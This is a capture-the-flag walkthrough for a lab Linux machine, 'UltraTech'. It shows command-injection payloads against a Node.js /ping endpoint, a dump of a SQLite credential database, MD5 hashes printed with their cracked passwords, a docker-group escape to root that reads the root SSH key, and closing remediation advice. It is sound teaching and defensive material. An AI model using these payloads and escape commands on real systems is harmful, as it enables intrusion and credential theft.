Target IP: 10.10.x.x (UltraTech) Difficulty: Medium Objective: User (r00t) & Root (root.txt / SSH Key)

1. Executive Summary

“UltraTech” is a Linux machine exposing a Node.js API and a standard Apache web server on non-standard ports. Initial access is achieved by discovering a Command Injection vulnerability in the API’s /ping endpoint. Instead of a traditional reverse shell, we exfiltrate the internal SQLite database to recover hashed credentials. Privilege escalation is achieved by abusing the user’s membership in the Docker group, allowing us to mount the host filesystem and access root artifacts.

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): Discovering high ports (8081, 31331).
  • T1059.004 (Command and Scripting Interpreter): Node.js Command Injection.
  • T1552 (Unsecured Credentials): Dumping SQLite database for hashes.
  • T1110 (Brute Force): Cracking MD5 hashes.
  • T1611 (Escape to Host): Abusing the Docker group to mount the host filesystem.

2. Enumeration

A. Network Scanning

We start with a full port scan, as standard ports didn’t reveal the full picture.

nmap -sS -p- --min-rate 5000 -oN nmap/all 10.10.x.x

Key Findings:

  • 21/tcp (FTP): vsftpd 3.0.3.
  • 22/tcp (SSH): OpenSSH 7.6p1.
  • 8081/tcp (HTTP): Node.js Express API (The “Blackice” banner is a red herring or default).
  • 31331/tcp (HTTP): Apache Web Server.

B. Web Enumeration (Port 31331)

Browsing http://10.10.x.x:31331 reveals the main “UltraTech” website.

  • Sitemap: /utech_sitemap.txt reveals /partners.html.
  • API Discovery: The login page or partners.html makes JavaScript requests to port 8081.

C. API Enumeration (Port 8081)

Fuzzing this port or analyzing the JavaScript source reveals two key endpoints:

  1. /auth: Handles login.
  2. /ping: Takes an ip parameter.

Vulnerability Check: Accessing /ping without parameters throws a generic error, leaking the server path (/home/www/api/index.js), confirming it is a Node.js Express application.


3. Initial Access: The Command Injection

A. The Vulnerability

The /ping endpoint likely passes the ip parameter to a system shell command (like ping <ip>). We can inject our own commands using backticks ``` or shell operators (|, ;).

Test Payload:

http://10.10.x.x:8081/ping?ip=`id`

Response: uid=1001(www) ... Conclusion: We have Remote Code Execution (RCE).

B. Data Exfiltration (The Database)

While a reverse shell is possible (using python3 or nc), you opted for a cleaner approach: Data Exfiltration. We list the files in the current directory:

/ping?ip=`ls`

Result: utech.db.sqlite

We dump the database contents directly to the browser:

/ping?ip=`cat utech.db.sqlite`

C. Cracking Credentials

The database dump reveals two users and their hashes:

  • r00t: f357a0c52799563c7c7b76c1e7543a32 -> n100906
  • admin: 0d0ea5111e3c1def594c1684e3b9be84 -> mrsheafy

Tool: Hashcat or CrackStation.

hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt

D. SSH Login

ssh r00t@10.10.x.x
# Password: n100906

Status: User r00t.


4. Privilege Escalation: Docker Group Abuse

A. Enumeration

We check our current privileges.

id
# uid=1001(r00t) gid=1001(r00t) groups=1001(r00t),116(docker)

Critical Finding: We are in the docker group.

B. The Vulnerability

The docker group grants the user the ability to communicate with the Docker Daemon socket. This is effectively Root access. We can spin up a container and mount the host’s root filesystem (/) into the container, bypassing all host file permissions.

C. The Exploit

We execute the standard GTFOBins Docker escape:

docker run -v /:/mnt --rm -it bash chroot /mnt sh

Breakdown:

  • -v /:/mnt: Mount the Host’s / directory to the Container’s /mnt directory.
  • --rm: Clean up the container after exit.
  • -it: Interactive TTY.
  • bash: The image to run (or alpine).
  • chroot /mnt sh: Change the root directory of the current process to /mnt (which is the Host’s real root) and spawn a shell.

Result: We are now effectively root on the host filesystem.

# whoami
root
# cat /root/.ssh/id_rsa

Root Flag: Found in /root/root.txt (or extracting the SSH key to log in properly).


5. Remediation (Blue Team)

  1. Input Sanitization: The /ping endpoint must validate that the ip input matches a specific format (e.g., IPv4 Regex) and should not pass user input directly to exec() or system() functions. Use language-specific libraries (e.g., child_process.execFile) that separate arguments from the command.
  2. Docker Security:
  • Do not add standard users to the docker group. It is functionally equivalent to giving them generic sudo access without a password.
  • Use Rootless Docker to limit the impact of a compromised container or daemon interaction.
  1. Port Security: Restrict access to internal API ports (8081) using a firewall (UFW/iptables) or bind them to localhost if they are only meant to be accessed by the frontend server.